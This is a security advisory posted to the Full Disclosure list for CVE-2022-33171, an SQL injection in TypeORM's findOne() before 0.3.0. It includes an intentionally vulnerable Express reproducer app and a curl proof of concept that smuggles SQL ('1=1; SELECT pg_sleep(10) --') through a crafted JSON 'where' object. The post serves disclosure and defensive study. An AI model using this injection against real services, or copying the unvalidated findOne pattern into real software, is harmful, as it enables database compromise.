Message-ID: <_aszEysggmJnx-1190ABuuskWJDfJxIINSfSbxbLlSJPwXiBRD1IY61vsX6TOlBcY-gpGLPf4yUYXeTm6nHXtYL36cblaY_Wqyz7CB6OA0g=@proton.me>
Date: Tue, 28 Jun 2022 17:22:11 +0000
From: lixts via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] typeorm CVE-2022-33171

typeorm CVE-2022-33171

findOne(id), findOneOrFail(id)

The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection.

The issue was already fixed from version 0.3.0 onward when we encountered it.

The maintainer does not consider this a vulnerability and stated that the root cause is bad input validation.

On one hand, input validation is definitely insufficient. On the other hand, this is a function argument that is meant to be fed user input, and as such one would think it safe to put user input there.

Vulnerable app:
```typescript
// Minimal reproducer for CVE-2022-33171 (TypeORM before 0.3.0), as posted.
// It is intentionally vulnerable: each element of the request body is passed
// straight to userRepo.findOne(), which in these versions accepts either an
// id string or a FindOneOptions object.
import 'reflect-metadata'; // required by TypeORM's decorators
import {
  Entity,
  PrimaryGeneratedColumn,
  Connection,
  ConnectionOptions,
  Repository,
  createConnection
} from 'typeorm';
import * as express from 'express';
import {Application, Request, Response} from 'express';

@Entity({ name: 'user' })
class User {
  @PrimaryGeneratedColumn('uuid')
  id!: string;
}

const connectionOpts: ConnectionOptions = {
  type: 'postgres',
  name: 'myconnection',
  host: 'db-host',
  port: 5432,
  username: 'username',
  password: 'password',
  database: 'mydb',
  schema: 'public',
  entities: [User]
};

let connection: Connection;

async function myListener(request: Request, response: Response) {
  if (!connection)
    connection = await createConnection(connectionOpts);
  const userRepo: Repository<User> = connection.getRepository(User);

  // The annotation is compile-time only: express.json() delivers whatever
  // the client sent, so an element may be an object rather than a string.
  const ids: string[] = request.body;
  for (const id of ids) {
    try {
      // Sink: an object such as {"where": "1=1; ..."} is treated as
      // FindOneOptions and its string `where` goes into the SQL as-is.
      await userRepo.findOne(id);
    } catch (err: any) {
      console.log(err);
    }
  }
  response.json({});
}

const app: Application = express();
app.use(express.json());
app.post("/findByIds", myListener);
app.listen(4444, () => console.log('App started'));
```

Exploit:
```shell
curl -v 'http://containerip:4444/findByIds' -H 'Content-Type: application/json' --data '[{"where":"1=1; SELECT pg_sleep(10) --"}]'
```
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
